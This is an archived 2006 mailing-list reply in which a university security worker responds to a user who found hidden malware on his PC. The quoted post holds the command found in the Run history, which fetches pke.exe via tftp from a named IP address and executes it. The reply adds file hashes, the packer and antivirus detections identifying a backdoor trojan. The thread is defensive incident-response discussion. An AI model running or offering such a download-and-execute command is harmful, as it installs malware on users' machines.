Subject: | |
From: | |
Reply To: | |
Date: | Thu, 14 Dec 2006 23:46:14 -0500 |
Content-Type: | text/plain |
Parts/Attachments: |
|
|
Craig Lalley wrote:
> I generally keep a good eye on my computer.
>
> Today I noticed that network packets were leaving my PC, without my understanding why.
>
> I turned off all processes, that could be communicating. I even looked at my Mcafee firewall, but nothing was identified.
>
> My task manager showed no processes that were unknown.
>
> I found this in my run commands drop down box.
> %comspec% /c tftp -i 66.36.241.146 GET pke.exe & start pke
>
> So, I downloaded process explorer from www.sysinternals.com.
>
> And low and behold there was a hidden process pke, consuming 49% of the CPU (think hyperthreading). I was able to kill it, and find the offending program and remove it.
>
> Has anyone seen anything like this before?
All the time, being a security person at a university. Question would
be, how did it get there. Are you patched? Did you get the timestamps
of the file before you deleted it? Recall what you were doing at the time?
The IP belongs to HopOne, which is "a really bad neighborhood". The
file itself:
File size: 18964 bytes
MD5: 8e6f28e1257d7dc0aa94b7b69a8721ca
SHA1: cbfa37aeb293fbbe082b86f0b4c83f3c38f53436
packers: ASPACK
Antivirus Version Update Result
AntiVir 7.3.0.15 12.14.2006 HEUR/Malware
BitDefender 7.2 12.15.2006 Generic.Malware.SYdld.228593FE
DrWeb 4.33 12.14.2006 BACKDOOR.Trojan
eSafe 7.0.14.0 12.14.2006 suspicious Trojan/Worm
Fortinet 2.82.0.0 12.15.2006 suspicious
Ikarus T3.1.0.26 12.14.2006 Trojan-Spy.Win32.Delf.OR
NOD32v2 1922 12.14.2006 probably unknown NewHeur_PE virus
Not sure what it is, but it's not nice. Will look into this one a bit,
haven't seen it before and it's not very well known based on the few
hits above.
Jeff
* To join/leave the list, search archives, change list settings, *
* etc., please visit http://raven.utc.edu/archives/hp3000-l.html *
|
|
|